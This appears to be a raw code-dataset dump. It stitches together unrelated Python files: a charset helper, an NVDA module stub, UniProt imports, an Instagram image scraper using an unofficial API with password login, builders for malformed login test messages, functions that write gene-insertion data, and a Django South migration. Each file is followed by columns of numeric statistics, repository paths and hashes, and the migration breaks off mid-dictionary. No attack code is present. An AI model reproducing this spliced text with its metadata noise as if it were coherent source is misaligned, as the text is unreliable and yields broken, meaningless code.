def charset_alpha():
return list("qwertyuiopasdfghjklzxcvbnm")
def charset_special():
return list("+=%_,.<>{}[]!@#$/^&*()\\`~-:;,?")
def charset_mix():
return list("qwertyuiopasdfghjklzxcvbnm+=%_<>{}[]!@#$/^&*()\\`~-:;,?.")
| 37.666667
| 72
| 0.584071
| 17
| 226
| 7.470588
| 0.470588
| 0.23622
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061947
| 226
| 6
| 72
| 37.666667
| 0.599057
| 0
| 0
| 0
| 0
| 0
| 0.497797
| 0.497797
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
e014306d5a7ab0b8b97b8038a47c1f90758fb8eb
| 109
|
py
|
Python
|
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
"""App module for Spring Tool Suite
This simply uses the app module for Eclipse.
"""
from .eclipse import *
| 18.166667
| 44
| 0.733945
| 17
| 109
| 4.705882
| 0.764706
| 0.225
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183486
| 109
| 5
| 45
| 21.8
| 0.898876
| 0.706422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e03dda7cf6e25b7ae21f106d59447852870e3c41
| 88
|
py
|
Python
|
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
from .ClientClasses import UniProtMapper
from .ClientClasses import UniProtProteinInfo
| 22
| 45
| 0.875
| 8
| 88
| 9.625
| 0.625
| 0.441558
| 0.597403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102273
| 88
| 3
| 46
| 29.333333
| 0.974684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e041d111e1906c97d276d4e9de998f9f1fc384ef
| 4,116
|
py
|
Python
|
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
from instagram_private_api import Client
# both functions retrieve images from the specified Instagram pages
# either for the official or the unofficial account of the brand
# they return a list of image URLs
def unofficial(user_name, password, LIMIT_IMAGE_COUNT, HASHTAG):
api = Client(user_name, password)
all_hash_image_posts_urls = []
next_max_id = None
while (api.feed_tag(HASHTAG, api.generate_uuid())["more_available"] == True) and (
len([item for sublist in all_hash_image_posts_urls for item in sublist]) <= LIMIT_IMAGE_COUNT):
if next_max_id == None:
# Gets the first 12 posts
posts = api.feed_tag(HASHTAG, api.generate_uuid())
len(posts['items'])
image_urls = []
for i in range(len(posts['items'])):
try:
url = posts['items'][i]['image_versions2']['candidates'][0][
'url'] # some posts do not have 'image_version2', they are overlooked in that case
image_urls.append(url)
except:
pass
# Extract the value *next_max_id* from the above response, this is needed to load the next 12 posts
next_max_id = posts["next_max_id"]
all_hash_image_posts_urls.append(image_urls)
else:
next_page_posts = api.feed_tag(HASHTAG, api.generate_uuid())
len(next_page_posts['items'])
# get image urls
next_image_urls = []
for i in range(len(next_page_posts['items'])):
try:
url = next_page_posts['items'][i]['image_versions2']['candidates'][0]['url']
next_image_urls.append(url)
except:
pass
# Extract the value *next_max_id*
next_max_id = next_page_posts["next_max_id"]
all_hash_image_posts_urls.append(next_image_urls)
else:
flat_hash_image_posts_urls = [item for sublist in all_hash_image_posts_urls for item in sublist]
print(f"A total of {len(flat_hash_image_posts_urls)} image post urls were retrieved from the Instagram page.")
return flat_hash_image_posts_urls
def official(user_name, password, LIMIT_IMAGE_COUNT, USERNAME):
api = Client(user_name, password)
all_image_posts_urls = []
next_max_id = None
while (api.username_feed(USERNAME, max_id=next_max_id)["more_available"] == True) and (
len([item for sublist in all_image_posts_urls for item in sublist]) <= LIMIT_IMAGE_COUNT):
if next_max_id == None:
# Gets the first 12 posts
posts = api.username_feed(USERNAME)
len(posts['items'])
image_urls = []
for i in range(len(posts['items'])):
try:
url = posts['items'][i]['image_versions2']['candidates'][0]['url']
image_urls.append(url)
except:
pass
# Extract the value *next_max_id* from the above response, this is needed to load the next 12 posts
next_max_id = posts["next_max_id"]
all_image_posts_urls.append(image_urls)
else:
next_page_posts = api.username_feed(USERNAME, max_id=next_max_id)
len(next_page_posts['items'])
# get image urls
next_image_urls = []
for i in range(len(next_page_posts['items'])):
try:
url = next_page_posts['items'][i]['image_versions2']['candidates'][0]['url']
next_image_urls.append(url)
except:
pass
# Extract the value *next_max_id*
next_max_id = next_page_posts["next_max_id"]
all_image_posts_urls.append(next_image_urls)
else:
flat_image_posts_urls = [item for sublist in all_image_posts_urls for item in sublist]
print(f"A total of {len(flat_image_posts_urls)} image post urls were retrieved from the Instagram page.")
return flat_image_posts_urls
| 44.258065
| 119
| 0.603013
| 541
| 4,116
| 4.288355
| 0.181146
| 0.043103
| 0.069828
| 0.062069
| 0.878879
| 0.857328
| 0.806466
| 0.793966
| 0.781897
| 0.67069
| 0
| 0.005967
| 0.307823
| 4,116
| 92
| 120
| 44.73913
| 0.808354
| 0.139213
| 0
| 0.628571
| 0
| 0
| 0.124363
| 0.01728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.114286
| 0.014286
| 0
| 0.071429
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e04f071ba3fe793cccc37aab8e381dcee1a65242
| 3,736
|
py
|
Python
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 9
|
2019-12-20T06:41:37.000Z
|
2020-09-21T03:34:47.000Z
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 38
|
2019-05-09T09:55:01.000Z
|
2022-01-04T10:52:46.000Z
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 13
|
2019-10-29T19:51:08.000Z
|
2021-11-25T15:08:02.000Z
|
"""
Login messages for testing
==========================
Authentication server login messages for testing
.. Copyright:
Copyright Wirepas Ltd 2019 licensed under Apache License, Version 2.0
See file LICENSE for full license details.
"""
from wirepas_messaging.wnt.ws_api import AuthenticationMessages
class Login(AuthenticationMessages):
    """Generates and decodes login messages for testing.

    Each ``message_login_*`` method builds one deliberately malformed (or
    deliberately wrong-valued) login request for negative-path tests,
    pretty-logs it, and returns it as a plain dict.
    """

    def __init__(self, logger, protocol_version: int) -> None:
        super().__init__(logger, protocol_version)

    def _log_and_return(self, message: dict) -> dict:
        """Log *message* pretty-printed at info level and hand it back."""
        self.logger.info(self.json_dump_pretty(message))
        return message

    def message_login_wo_version(self, username: str, password: str) -> dict:
        """Returns a login request message without version"""
        return self._log_and_return(
            {
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "data": {"username": username, "password": password},
            }
        )

    def message_login_wo_type(self, username: str, password: str) -> dict:
        """Returns a login request message without type"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "data": {"username": username, "password": password},
            }
        )

    def message_login_wo_username(self, password: str) -> dict:
        """Returns a login request message without user name"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "data": {"password": password},
            }
        )

    def message_login_wo_password(self, username: str) -> dict:
        """Returns a login request message without password"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "data": {"username": username},
            }
        )

    def message_login_wrong_version(self, username: str, password: str) -> dict:
        """Returns a login request message with wrong version"""
        return self._log_and_return(
            {
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "version": 34,
                "data": {"username": username, "password": password},
            }
        )

    def message_login_wrong_type(self, username: str, password: str) -> dict:
        """Returns a login request message with wrong type"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "type": 123,
                "data": {"username": username, "password": password},
            }
        )

    def message_login_wrong_username(self, password: str) -> dict:
        """Returns a login request message with wrong user name"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "data": {"username": "incorrect", "password": password},
            }
        )

    def message_login_wrong_password(self, username: str) -> dict:
        """Returns a login request message with wrong password"""
        return self._log_and_return(
            {
                "version": self.protocol_version,
                "type": AuthenticationMessages.MessageTypes.LOGIN.value,
                "data": {"username": username, "password": "something"},
            }
        )
| 35.580952
| 80
| 0.649893
| 404
| 3,736
| 5.866337
| 0.168317
| 0.037975
| 0.050633
| 0.050633
| 0.818143
| 0.818143
| 0.818143
| 0.781857
| 0.74346
| 0.736709
| 0
| 0.00394
| 0.252677
| 3,736
| 104
| 81
| 35.923077
| 0.844914
| 0.18576
| 0
| 0.606061
| 0
| 0
| 0.006071
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0.227273
| 0.015152
| 0
| 0.287879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
167a3abf86e6bac79acfd6f9468b2ada4c43d8ac
| 5,567
|
py
|
Python
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 2
|
2021-11-23T09:39:35.000Z
|
2022-01-25T15:49:45.000Z
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 76
|
2021-07-07T18:31:44.000Z
|
2022-03-22T10:04:40.000Z
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 2
|
2021-09-16T10:56:20.000Z
|
2022-01-25T12:33:25.000Z
|
def save_per_gene_insertions(
    filename,
    tn_coordinates,
    gene_coordinates,
    chr_lengths_cumsum,
    ref_tid_roman,
    aliases_designation,
):
    """Write per-gene transposon-insertion data to a tab-separated text file.

    Columns written (tab-separated, one header line first): Gene name,
    Chromosome, Start location, End location, Insertion locations,
    Reads per insertion location.

    Parameters
    ----------
    filename : str
        Destination path, extension included (e.g. "data_file/file.txt").
        Conventionally stored next to the bamfile with the same basename,
        e.g. data_file/data_1.bam -> data_file/data_1.bam_pergene_insertions.txt
    tn_coordinates : dict
        Per-gene insertion data, as produced by get_insertions_and_reads.
        tn_coordinates[gene] is indexed as: [0] chromosome, [1] start,
        [2] end, [3] list of insertion coordinates, [4] reads per insertion.
    gene_coordinates : dict
        Output of add_chromosome_length; gene_coordinates[gene][0] is a
        chromosome id resolvable through ref_tid_roman.
    chr_lengths_cumsum : dict
        Roman chromosome name -> cumulative chromosome-length offset
        (from get_sequence_length); subtracted to get per-chromosome
        coordinates.
    ref_tid_roman : dict
        Chromosome id -> Roman-numeral chromosome name.
    aliases_designation : dict
        gene -> list of aliases (from read_genes); the first alias replaces
        the systematic gene name in the output when present.
    """
    header = (
        "Gene name\tChromosome\tStart location\tEnd location"
        "\tInsertion locations\tReads per insertion location\n"
    )
    with open(filename, "w") as f:
        f.write(header)
        for gene, data in tn_coordinates.items():
            gene_chrom = ref_tid_roman.get(gene_coordinates.get(gene)[0])
            # Hoist the per-chromosome offset: the original looked it up
            # three times per gene.
            offset = chr_lengths_cumsum.get(gene_chrom)
            insertion_coords = [ins - offset for ins in data[3]]
            # Prefer the first known alias over the systematic name;
            # .get with a one-element fallback replaces the membership check.
            gene_alias = aliases_designation.get(gene, [gene])[0]
            row = "\t".join(
                [
                    gene_alias,
                    str(data[0]),
                    str(data[1] - offset),
                    str(data[2] - offset),
                    str(insertion_coords),
                    str(data[4]),
                ]
            )
            f.write(row + "\n")
def save_per_essential_insertions(
    filename,
    tn_coordinates,
    gene_coordinates,
    chr_lengths_cumsum,
    ref_tid_roman,
    aliases_designation,
):
    """Write insertion data for annotated essential genes to a .txt file.

    Columns written (tab-separated, one header line first): Essential gene
    name, Chromosome, Start location, End location, Insertion locations,
    Reads per insertion location.

    Parameters
    ----------
    filename : str
        Destination path, extension included (e.g. "data_file/file.txt").
        Conventionally stored next to the bamfile with the same basename,
        e.g. data_file/data_1.bam -> data_file/data_1.bam_peressential_insertions.txt
    tn_coordinates : dict
        Per-gene insertion data, as produced by get_insertions_and_reads.
        tn_coordinates[gene] is indexed as: [0] chromosome, [1] start,
        [2] end, [3] list of insertion coordinates, [4] reads per insertion.
    gene_coordinates : dict
        Output of add_chromosome_length; gene_coordinates[gene][0] is a
        chromosome id resolvable through ref_tid_roman.
    chr_lengths_cumsum : dict
        Roman chromosome name -> cumulative chromosome-length offset
        (from get_sequence_length); subtracted to get per-chromosome
        coordinates.
    ref_tid_roman : dict
        Chromosome id -> Roman-numeral chromosome name.
    aliases_designation : dict
        gene -> list of aliases (from read_genes); the first alias replaces
        the systematic gene name in the output when present.
    """
    header = (
        "Essential gene name\tChromosome\tStart location\tEnd location"
        "\tInsertion locations\tReads per insertion location\n"
    )
    with open(filename, "w") as f:
        f.write(header)
        for gene, data in tn_coordinates.items():
            gene_chrom = ref_tid_roman.get(gene_coordinates.get(gene)[0])
            # Hoist the per-chromosome offset: the original looked it up
            # three times per gene.
            offset = chr_lengths_cumsum.get(gene_chrom)
            insertion_coords = [ins - offset for ins in data[3]]
            # Prefer the first known alias over the systematic name;
            # .get with a one-element fallback replaces the membership check.
            gene_alias = aliases_designation.get(gene, [gene])[0]
            row = "\t".join(
                [
                    gene_alias,
                    str(data[0]),
                    str(data[1] - offset),
                    str(data[2] - offset),
                    str(insertion_coords),
                    str(data[4]),
                ]
            )
            f.write(row + "\n")
| 40.635036
| 135
| 0.633196
| 679
| 5,567
| 4.913108
| 0.181149
| 0.070144
| 0.071343
| 0.045564
| 0.908873
| 0.908873
| 0.908873
| 0.908873
| 0.893285
| 0.893285
| 0
| 0.005341
| 0.293695
| 5,567
| 136
| 136
| 40.933824
| 0.843082
| 0.50494
| 0
| 0.861111
| 0
| 0.013889
| 0.095649
| 0.018032
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
168c261b5d97a7d99a4494670d3e2ae9e67e4141
| 46,260
|
py
|
Python
|
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | null | null | null |
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | null | null | null |
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | 1
|
2020-01-08T09:06:37.000Z
|
2020-01-08T09:06:37.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Add the 'user_name' TextField column to all three contact tables."""
    for table in (
        u'envelope_solutioncontact',
        u'envelope_companycontact',
        u'envelope_productcontact',
    ):
        db.add_column(
            table,
            'user_name',
            self.gf('django.db.models.fields.TextField')(default='no user name'),
            keep_default=False,
        )
def backwards(self, orm):
    """Drop the 'user_name' column from all three contact tables."""
    for table in (
        u'envelope_solutioncontact',
        u'envelope_companycontact',
        u'envelope_productcontact',
    ):
        db.delete_column(table, 'user_name')
models = {
u'actstream.action': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Action'},
'action_object_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'action_object'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'action_object_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'actor_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actor'", 'to': u"orm['contenttypes.ContentType']"}),
'actor_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'batch_time_minutes': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_batchable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'timestamp_date': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'articles.topics': {
'Meta': {'object_name': 'Topics'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'topic_created_by'", 'to': u"orm['auth.User']"}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'on_nav': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'topic_children'", 'null': 'True', 'to': "orm['articles.Topics']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'topic_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'relationships': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_to'", 'symmetrical': 'False', 'through': u"orm['relationships.Relationship']", 'to': u"orm['auth.User']"}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'cities_light.city': {
'Meta': {'ordering': "['name']", 'unique_together': "(('region', 'name'), ('region', 'slug'))", 'object_name': 'City'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'feature_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'population': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Region']", 'null': 'True', 'blank': 'True'}),
'search_names': ('cities_light.models.ToSearchTextField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"})
},
u'cities_light.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"}),
'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
},
u'cities_light.region': {
'Meta': {'ordering': "['name']", 'unique_together': "(('country', 'name'), ('country', 'slug'))", 'object_name': 'Region'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"})
},
u'companies.bimcourses': {
'Meta': {'object_name': 'BimCourses'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_course_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_course_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.bimcoursestype': {
'Meta': {'object_name': 'BimCoursesType'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_course_type_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
